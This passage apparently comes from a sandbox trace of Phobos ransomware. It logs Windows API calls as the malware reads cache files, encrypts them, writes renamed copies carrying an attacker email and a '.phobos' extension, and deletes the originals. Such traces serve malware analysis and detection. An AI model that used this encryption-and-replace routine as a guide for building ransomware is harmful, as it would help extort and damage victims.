pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.700] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.700] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.701] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.701] CloseHandle (hObject=0x15c) returned 1 [0197.701] CloseHandle (hObject=0x180) returned 1 [0197.701] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4")) returned 1 [0197.702] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.703] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=398) returned 1 [0197.703] CloseHandle (hObject=0x180) returned 1 [0197.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21")) returned 0x2024 [0197.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.703] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.703] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.864] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.864] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18e, lpOverlapped=0x0) returned 1 [0197.865] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.865] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.866] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.866] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.866] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.866] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.866] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.866] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.866] CloseHandle (hObject=0x180) returned 1 [0197.866] CloseHandle (hObject=0x118) returned 1 [0197.867] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21")) returned 1 [0197.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.868] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=434) returned 1 [0197.868] CloseHandle (hObject=0x118) returned 1 [0197.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6")) returned 0x2024 [0197.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.868] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.869] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.869] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.869] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1b2, lpOverlapped=0x0) returned 1 [0197.870] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1c0) returned 1 [0197.870] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1c0, lpOverlapped=0x0) returned 1 [0197.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.871] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.871] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.871] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.871] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.871] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.871] CloseHandle (hObject=0x118) returned 1 [0197.871] CloseHandle (hObject=0x180) returned 1 [0197.872] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6")) returned 1 [0197.873] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.873] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=220) returned 1 [0197.873] CloseHandle (hObject=0x180) returned 1 [0197.873] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 0x2024 [0197.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.874] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.874] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.875] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.875] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.875] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xdc, lpOverlapped=0x0) returned 1 [0197.875] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0, dwBufLen=0xe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0) returned 1 [0197.875] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe0, lpOverlapped=0x0) returned 1 [0197.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.876] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.876] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0197.876] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.876] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0197.876] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.876] CloseHandle (hObject=0x180) returned 1 [0197.877] CloseHandle (hObject=0x118) returned 1 [0197.877] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 1 [0197.877] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=404) returned 1 [0197.880] CloseHandle (hObject=0x118) returned 1 [0197.880] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d")) returned 0x2024 [0197.880] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.880] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.880] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.881] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.881] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x194, lpOverlapped=0x0) returned 1 [0197.882] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.882] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.882] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.882] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.882] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.882] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.882] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.883] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.883] CloseHandle (hObject=0x118) returned 1 [0197.883] CloseHandle (hObject=0x180) returned 1 [0197.883] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d")) returned 1 [0197.884] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.884] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=404) returned 1 [0197.884] CloseHandle (hObject=0x180) returned 1 [0197.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6")) returned 0x2024 [0197.884] GetFileAttributesW 